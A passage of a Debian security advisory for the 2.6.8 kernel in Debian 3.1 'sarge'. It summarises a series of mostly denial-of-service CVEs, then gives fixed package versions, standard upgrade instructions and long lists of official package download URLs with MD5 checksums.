Doug Chapman discovered that passing a 0 zero bitmask to the set_mempolicy()\n system call leads to a kernel panic, which allows a denial of service attack.\n\nCVE-2005-3783\n\n The ptrace code using CLONE_THREAD didn't use the thread group ID to\n determine whether the caller is attaching to itself, which allows a denial\n of service attack.\n\nCVE-2005-3784\n\n The auto-reaping of childe processes functionality included ptraced-attached\n processes, which allows denial of service through dangling references.\n\nCVE-2005-3806\n\n Yen Zheng discovered that the IPv6 flow label code modified an incorrect variable,\n which could lead to memory corruption and denial of service.\n\nCVE-2005-3847\n\n It was discovered that a threaded real-time process, which is currently dumping\n core can be forced into a dead-lock situation by sending it a SIGKILL signal,\n which allows a denial of service attack. \n\nCVE-2005-3848\n\n Ollie Wild discovered a memory leak in the icmp_push_reply() function, which\n allows denial of service through memory consumption.\n\nCVE-2005-3857\n\n Chris Wright discovered that excessive allocation of broken file lock leases\n in the VFS layer can exhaust memory and fill up the system logging, which allows\n denial of service.\n\nCVE-2005-3858\n\n Patrick McHardy discovered a memory leak in the ip6_input_finish() function from\n the IPv6 code, which allows denial of service.\n\nCVE-2005-4605\n\n Karl Janmar discovered that a signedness error in the procfs code can be exploited\n to read kernel memory, which may disclose sensitive information.\n\nCVE-2005-4618\n\n Yi Ying discovered that sysctl does not properly enforce the size of a buffer, which\n allows a denial of service attack.\n\nCVE-2006-0095\n\n Stefan Rompf discovered that dm_crypt does not clear an internal struct before freeing\n it, which might disclose sensitive information.\n\nCVE-2006-0096\n\n It was discovered that the SDLA driver's capability checks were too lax\n for firmware upgrades.\n\nCVE-2006-0482\n\n Ludovic Courtes discovered that get_compat_timespec() performs insufficient input\n sanitizing, which allows a local denial of service attack.\n\nCVE-2006-1066\n\n It was discovered that ptrace() on the ia64 architecture allows a local denial of\n service attack, when preemption is enabled.\n\n\nThe following matrix explains which kernel version for which architecture\nfix the problems mentioned above:\n\n Debian 3.1 (sarge)\n Source 2.6.8-16sarge2\n Alpha architecture 2.6.8-16sarge2\n AMD64 architecture 2.6.8-16sarge2\n HP Precision architecture 2.6.8-6sarge2\n Intel IA-32 architecture 2.6.8-16sarge2\n Intel IA-64 architecture 2.6.8-14sarge2\n Motorola 680x0 architecture 2.6.8-4sarge2\n PowerPC architecture 2.6.8-12sarge2\n IBM S/390 architecture 2.6.8-5sarge2\n Sun Sparc architecture 2.6.8-15sarge2\n\nThe following matrix lists additional packages that were rebuilt for\ncompatability with or to take advantage of this update:\n\n Debian 3.1 (sarge)\n kernel-latest-2.6-alpha 101sarge1\n kernel-latest-2.6-amd64 103sarge1\n kernel-latest-2.6-hppa 2.6.8-1sarge1\n kernel-latest-2.6-sparc 101sarge1\n kernel-latest-2.6-i386 101sarge1\n kernel-latest-powerpc 102sarge1\n fai-kernels 1.9.1sarge1\n hostap-modules-i386 0.3.7-1sarge1\n mol-modules-2.6.8 0.9.70+2.6.8+12sarge1\n ndiswrapper-modules-i386 1.1-2sarge1\n\nWe recommend that you upgrade your kernel package immediately and reboot\nthe machine. If you have built a custom kernel from the kernel source\npackage, you will need to rebuild to take advantage of these fixes.\n\nThis update introduces a change in the kernel's binary interface, the affected\nkernel packages inside Debian have been rebuilt, if you're running local addons\nyou'll need to rebuild these as well.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-m68k_2.6.8-4sarge2.dsc\n Size/MD5 checksum: 874 a35d48f0d5b6c679b5130fb3aaa647cb\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-m68k_2.6.8-4sarge2.tar.gz\n Size/MD5 checksum: 14256 7c44e2e875b7995f5bb14effb5684b7d\n http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-16sarge2.dsc\n Size/MD5 checksum: 1004 f98203872db1017d6053ababb496116d\n http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-16sarge2.diff.gz\n Size/MD5 checksum: 1015096 0bb501098f732e6750e3413f4e9d148f\n http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8.orig.tar.gz\n Size/MD5 checksum: 43929719 0393c05ffa4770c3c5178b74dc7a4282\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-latest-2.6-amd64_103sarge1.dsc\n Size/MD5 checksum: 896 caa3c2d1f06666c61ba31917a3c26b1f\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-latest-2.6-amd64_103sarge1.tar.gz\n Size/MD5 checksum: 2396 d71945b6f493574ce0d360de316f1873\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-alpha/kernel-latest-2.6-alpha_101sarge1.dsc\n Size/MD5 checksum: 685 54417bc7eddc5722e0f5ce734e67edb9\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-alpha/kernel-latest-2.6-alpha_101sarge1.tar.gz\n Size/MD5 checksum: 1954 1cdaccf68580892b42cd88b5c5b03b9b\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-sparc/kernel-latest-2.6-sparc_101sarge1.dsc\n Size/MD5 checksum: 786 e99a3432c467f4f76e9b6e852333a9c5\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-sparc/kernel-latest-2.6-sparc_101sarge1.tar.gz\n Size/MD5 checksum: 2123 d90ea9aa1ccb9ad3041d5d3b20894330\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-hppa/kernel-latest-2.6-hppa_2.6.8-1sarge1.dsc\n Size/MD5 checksum: 813 e860fc8f679fdedb3817d09e25c77b66\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-hppa/kernel-latest-2.6-hppa_2.6.8-1sarge1.tar.gz\n Size/MD5 checksum: 2055 3fb20a5238ac6dc6a84ba67a887d752e\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge1.dsc\n Size/MD5 checksum: 621 c8d489fa28bd6b65bd3bda1a460d8a08\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge1.tar.gz\n Size/MD5 checksum: 24387 25e9d10a881601e9329291faf5110b55\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-latest-powerpc_102sarge1.dsc\n Size/MD5 checksum: 993 6cd9024b61b9a6cf4862e204d330b9a3\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-latest-powerpc_102sarge1.tar.gz\n Size/MD5 checksum: 2661 d7bf35beb4924d8dab10b08380e9e289\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-i386/kernel-latest-2.6-i386_101sarge1.dsc\n Size/MD5 checksum: 862 9d55e1790bcc518f315b44a52ed331bc\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-i386/kernel-latest-2.6-i386_101sarge1.tar.gz\n Size/MD5 checksum: 2286 1e9932ed547a85a43b82c10ac9b11800\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-i386_2.6.8-16sarge2.dsc\n Size/MD5 checksum: 1047 8fa892195f50896a45f4a2c64f66ce11\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-i386_2.6.8-16sarge2.tar.gz\n Size/MD5 checksum: 89240 5987c1e4d49bb7b3159f3a42b22d1e4f\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-hppa_2.6.8-6sarge2.dsc\n Size/MD5 checksum: 1008 9c8bbaf47e657e4ac707c6f35cee0f2e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-hppa_2.6.8-6sarge2.tar.gz\n Size/MD5 checksum: 65886 0f42b0e9fc22cd2d5eb615d8f4f6922d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-amd64_2.6.8-16sarge2.dsc\n Size/MD5 checksum: 1103 df823aaf30d2d39f51762abf0fdab8e4\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-amd64_2.6.8-16sarge2.tar.gz\n Size/MD5 checksum: 74018 415ea9bd8c15a343646a762c7ecbeb2c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-alpha_2.6.8-16sarge2.dsc\n Size/MD5 checksum: 812 3689bf78b872510caeaeaefe3a76b477\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-alpha_2.6.8-16sarge2.tar.gz\n Size/MD5 checksum: 37429 69216b4fe13afb383e5559e4100439ff\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-patch-powerpc-2.6.8_2.6.8-12sarge2.dsc\n Size/MD5 checksum: 1071 f1d5f3c6a58c3b2efbecb6f481bc6e13\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-patch-powerpc-2.6.8_2.6.8-12sarge2.tar.gz\n Size/MD5 checksum: 25410 78cd732eb81df1bae3f513eb68aa95c0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-ia64_2.6.8-14sarge2.dsc\n Size/MD5 checksum: 1191 8a58beb88416f8235e0ccf91b94bda5e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-ia64_2.6.8-14sarge2.tar.gz\n Size/MD5 checksum: 62533 d3a0fd97437e9eb69f07b5297246610b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-s390_2.6.8-5sarge2.dsc\n Size/MD5 checksum: 833 aa306a38d5cf9f45e601633d239f868e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-s390_2.6.8-5sarge2.tar.gz\n Size/MD5 checksum: 11437 2c70d8408f9656fba114ee59f22cb44b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-sparc_2.6.8-15sarge2.dsc\n Size/MD5 checksum: 1036 b2db64932de00311794a14eaded25ec3\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-sparc_2.6.8-15sarge2.tar.gz\n Size/MD5 checksum: 22798 9d94f73ab654770fc251125e1332b2be\n http://security.debian.org/pool/updates/main/m/mol-modules-2.6.8/mol-modules-2.6.8_0.9.70+2.6.8+12sarge1.dsc\n Size/MD5 checksum: 703 f5c46506673becb263a62307591041b9\n http://security.debian.org/pool/updates/main/m/mol-modules-2.6.8/mol-modules-2.6.8_0.9.70+2.6.8+12sarge1.tar.gz\n Size/MD5 checksum: 4326 f6191f77c2f41e397e47b727b30d1f64\n http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-i386_0.3.7-1sarge1.dsc\n Size/MD5 checksum: 1092 926d84df8f84a7c9cc68add4fee27427\n http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-i386_0.3.7-1sarge1.tar.gz\n Size/MD5 checksum: 2273 896ab1f6cbb18b1afd092845b8e12523\n http://security.debian.org/pool/updates/main/n/ndiswrapper-modules-i386/ndiswrapper-modules-i386_1.1-2sarge1.dsc\n Size/MD5 checksum: 894 97a270d1e39bfd032314dc3171831846\n http://security.debian.org/pool/updates/main/n/ndiswrapper-modules-i386/ndiswrapper-modules-i386_1.1-2sarge1.tar.gz\n Size/MD5 checksum: 1782 1c5a70ee63b83630319152768b924a98\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-alpha/kernel-headers-2.6-generic_101sarge1_alpha.deb\n Size/MD5 checksum: 1980 0f1542a109fbe036fb8af44e20397299\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-alpha/kernel-headers-2.6-smp_101sarge1_alpha.deb\n Size/MD5 checksum: 1980 d75c152fdab411ad8184ba6331015dcd\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-alpha/kernel-image-2.6-generic_101sarge1_alpha.deb\n Size/MD5 checksum: 1980 69be478f2fa35a994c02a4f3b450a60e\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-alpha/kernel-image-2.6-smp_101sarge1_alpha.deb\n Size/MD5 checksum: 1990 3ca05863dcaa11c43c0c7d4c29e4ddfd\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-2_2.6.8-16sarge1_alpha.deb\n Size/MD5 checksum: 2757876 e94cdb8d12552d293018c7ca24199f47\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-2-generic_2.6.8-16sarge1_alpha.deb\n Size/MD5 checksum: 230608 fdf2cc6f010f2b618672422c3293f3b9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-2-smp_2.6.8-16sarge1_alpha.deb\n Size/MD5 checksum: 225502 2a21bf8197792a789420b1838526186f\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-3_2.6.8-16sarge2_alpha.deb\n Size/MD5 checksum: 2758214 0ecffff87c9a03f6f19147c61a5fc48b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-3-generic_2.6.8-16sarge2_alpha.deb\n Size/MD5 checksum: 230730 3b29ce53073ac08216153a5d6e4b629e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-3-smp_2.6.8-16sarge2_alpha.deb\n Size/MD5 checksum: 225634 316c8d48a8a59da90707fb03e2149bc0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-2-generic_2.6.8-16sarge1_alpha.deb\n Size/MD5 checksum: 20226800 f627945f7f8216fbe6961a9559766f29\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-2-smp_2.6.8-16sarge1_alpha.deb\n Size/MD5 checksum: 20068720 7aa6c0137c94e2e7ee45e5ae702cfe27\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-3-generic_2.6.8-16sarge2_alpha.deb\n Size/MD5 checksum: 20218454 9d8030373efb6dc3e2dfded09cf5c0d5\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-3-smp_2.6.8-16sarge2_alpha.deb\n Size/MD5 checksum: 20068918 710fee78a9ffbde5694b71af50e0060c\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-headers-2.6-amd64-generic_103sarge1_amd64.deb\n Size/MD5 checksum: 2104 ef0b887f5fbe7a50eb29b9f758f4dbe7\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-headers-2.6-amd64-k8_103sarge1_amd64.deb\n Size/MD5 checksum: 2112 99fc45919e4e99c75b9c9caa96892684\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-headers-2.6-amd64-k8-smp_103sarge1_amd64.deb\n Size/MD5 checksum: 2110 56ce795b6f72a01261f554d7f80e17f7\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-headers-2.6-em64t-p4_103sarge1_amd64.deb\n Size/MD5 checksum: 2126 687cd2d07a2216bd06b3e7167c34429a\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-headers-2.6-em64t-p4-smp_103sarge1_amd64.deb\n Size/MD5 checksum: 2122 80b347bd1c3b75ba8e6019eb4515131d\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-image-2.6-amd64-generic_103sarge1_amd64.deb\n Size/MD5 checksum: 2158 593b2f6857005238309652f1ed07b025\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-image-2.6-amd64-k8_103sarge1_amd64.deb\n Size/MD5 checksum: 2166 c195509461a3829a88149ecb25dbcd3a\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-image-2.6-amd64-k8-smp_103sarge1_amd64.deb\n Size/MD5 checksum: 2172 d87ecb48ff4c9706e28bee9b5e523f0d\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-image-2.6-em64t-p4_103sarge1_amd64.deb\n Size/MD5 checksum: 2218 28145de5465f3149b0fb7182c07e2dbb\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-image-2.6-em64t-p4-smp_103sarge1_amd64.deb\n Size/MD5 checksum: 2248 a709d2651b5bc6f16a46e482513ffd7c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-11_2.6.8-16sarge1_amd64.deb\n Size/MD5 checksum: 2719948 51945c8ba3e5d86f81df067f73225201\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-11-amd64-generic_2.6.8-16sarge1_amd64.deb\n Size/MD5 checksum: 224276 33205d1399f5df2dce3583f737fb528a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-11-amd64-k8_2.6.8-16sarge1_amd64.deb\n Size/MD5 checksum: 223300 bb55484a26b5a9a3fc01b68af37af569\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-11-amd64-k8-smp_2.6.8-16sarge1_amd64.deb\n Size/MD5 checksum: 219178 010a7d13b9c5546006b736caddcfb1b9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-11-em64t-p4_2.6.8-16sarge1_amd64.deb\n Size/MD5 checksum: 221054 c3674ad6b1c88ae5aa1c36c732fe1fe0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-11-em64t-p4-smp_2.6.8-16sarge1_amd64.deb\n Size/MD5 checksum: 217440 22ab9501c6422fd3b160e27bf7a59d2d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12_2.6.8-16sarge2_amd64.deb\n Size/MD5 checksum: 2720186 0db767733816d0a1d4a5e9840348532b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-generic_2.6.8-16sarge2_amd64.deb\n Size/MD5 checksum: 224506 7b32141a97738499376939faf694b031\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-k8_2.6.8-16sarge2_amd64.deb\n Size/MD5 checksum: 223506 3461e58701032b00a0340f931af02325\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-k8-smp_2.6.8-16sarge2_amd64.deb\n Size/MD5 checksum: 219164 e3841dd8bc0d6a326a2b186a2febe880\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-em64t-p4_2.6.8-16sarge2_amd64.deb\n Size/MD5 checksum: 221058 aa43b631e5516324f5e357a50bf03919\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-em64t-p4-smp_2.6.8-16sarge2_amd64.deb\n Size/MD5 checksum: 217500 181e3fa415a02835b62dc538562650bb\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-11-amd64-generic_2.6.8-16sarge1_amd64.deb\n Size/MD5 checksum: 12558694 a27949d59b7d84a4638ddb91a273ef47\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-11-amd64-k8_2.6.8-16sarge1_amd64.deb\n Size/MD5 checksum: 13250392 9c8f5ebcb94dd1509f46c4056d0555be\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-11-amd64-k8-smp_2.6.8-16sarge1_amd64.deb\n Size/MD5 checksum: 13210004 b701fd7c35dccc26dfaba57183de5c2d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-11-em64t-p4_2.6.8-16sarge1_amd64.deb\n Size/MD5 checksum: 13058704 1ac0827d7d189589c92f6e9cf07def85\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-11-em64t-p4-smp_2.6.8-16sarge1_amd64.deb\n Size/MD5 checksum: 13042396 f41bf487053ea369d2ba635d7c2bb03c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-generic_2.6.8-16sarge2_amd64.deb\n Size/MD5 checksum: 12560178 13c61c6f63e666a2da9d35e9b4b829b3\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-k8_2.6.8-16sarge2_amd64.deb\n Size/MD5 checksum: 13251702 4a87624ae820a7fef519660321ccd002\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-k8-smp_2.6.8-16sarge2_amd64.deb\n Size/MD5 checksum: 13213610 6f574e36cbe1c9adbac496968998d389\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-em64t-p4_2.6.8-16sarge2_amd64.deb\n Size/MD5 checksum: 13061358 d9bdb5fdcd2ca14594b4c4eeb0ec4e95\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-em64t-p4-smp_2.6.8-16sarge2_amd64.deb\n Size/MD5 checksum: 13044562 61005d327a9ea9efed46625e79710689\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-headers-2.6-amd64-generic_103sarge1_i386.deb\n Size/MD5 checksum: 2106 fcb23b2830bed29439b86f0174bc36b0\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-headers-2.6-amd64-k8_103sarge1_i386.deb\n Size/MD5 checksum: 2126 4261e8ea28972c4b1a0328491c142e9d\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-headers-2.6-amd64-k8-smp_103sarge1_i386.deb\n Size/MD5 checksum: 2114 3a59ea468ed72766258d4c6d4ca721d9\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-headers-2.6-em64t-p4_103sarge1_i386.deb\n Size/MD5 checksum: 2134 bfbd467ce5c19e5e1909beb867da57c6\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-headers-2.6-em64t-p4-smp_103sarge1_i386.deb\n Size/MD5 checksum: 2130 8c3cb8de73fecb230bf869dce2e92e9b\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-image-2.6-amd64-generic_103sarge1_i386.deb\n Size/MD5 checksum: 2160 3fdac05d7afc2d522191b8672310e3bb\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-image-2.6-amd64-k8_103sarge1_i386.deb\n Size/MD5 checksum: 2168 78248b7c5024afdd3e8bcf8f3b85fdd0\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-image-2.6-amd64-k8-smp_103sarge1_i386.deb\n Size/MD5 checksum: 2180 33dbe8a50cd2deb102b2c26c3451cb0d\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-image-2.6-em64t-p4_103sarge1_i386.deb\n Size/MD5 checksum: 2228 8f87a7c45040d6192c7dd7521719bb84\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-amd64/kernel-image-2.6-em64t-p4-smp_103sarge1_i386.deb\n Size/MD5 checksum: 2250 0220661e0e1c24c0248a54ed13f93e96\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-i386/kernel-headers-2.6-386_101sarge1_i386.deb\n Size/MD5 checksum: 2150 f710e37e9e5af100ef65b167020739ca\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-i386/kernel-headers-2.6-686_101sarge1_i386.deb\n Size/MD5 checksum: 2184 0dcabd1f69fe86bb1d431f193d032a5d\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-i386/kernel-headers-2.6-686-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2248 88dbce576e5ec5b484085f0e7f204b1c\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-i386/kernel-headers-2.6-k7_101sarge1_i386.deb\n Size/MD5 checksum: 2160 459222cd722e8c592fef62a5e64d2e29\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-i386/kernel-headers-2.6-k7-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2228 a528e1e7db01a3280a2bab86383f8f9e\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-i386/kernel-image-2.6-386_101sarge1_i386.deb\n Size/MD5 checksum: 2152 64f8938c4ccf9a567ace8906474a3a05\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-i386/kernel-image-2.6-686_101sarge1_i386.deb\n Size/MD5 checksum: 2182 3fc7225f53712469830cb60404598287\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-i386/kernel-image-2.6-686-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2252 97cc65172e9583cf0299c68e53b2dbc3\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-i386/kernel-image-2.6-k7_101sarge1_i386.deb\n Size/MD5 checksum: 2164 cbd1dd8a0dc39c35598c131e0473ce46\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-i386/kernel-image-2.6-k7-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2232 5a55c3acad554351348c2c4bbe9347b9\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge1_i386.deb\n Size/MD5 checksum: 11986970 3f1f1b972c9aea7e324d3f16252c1a14\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-2_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 2777236 af649947c652a9486461b92bbc33be8a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-2-386_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 256920 88db1b684f215fdd35de0989f148b57f\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-2-686_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 254646 553205bb17cfc57f4c4a7aadff46650a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-2-686-smp_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 251590 51ebd6202b7f347f66df0e189b2a3946\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-2-k7_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 254818 746967059979238eb49cfdcba572c07b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-2-k7-smp_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 251708 33a61355c7a48d87b7570b772e454760\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 2777384 1bb1a12e5057dff0213af9d62e204e1a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-386_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 256932 4ffede1559073c0fac6256ebf6bf0fa2\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-686_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 254820 e24193f1e1a4e0f19e4f6dea078b94a3\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-686-smp_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 251726 9afbac1038d98e6377a02ff6aebb3441\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-k7_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 254918 e32f308990db81bff7295a4724dfa23a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-k7-smp_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 251742 c4ad3e4f52e907067a44f25214b6b34f\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-2-386_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 14058198 fd607b13caf99093ef31071ff7395d6d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-2-686_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 15531820 5871afdf04de65bda6f5eb3266b0621d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-2-686-smp_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 15339250 f3ab94a1304a28732cea6be8dd871ac7\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-2-k7_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 15258514 cc888a3d69727d61b86a7f0945a51eff\n 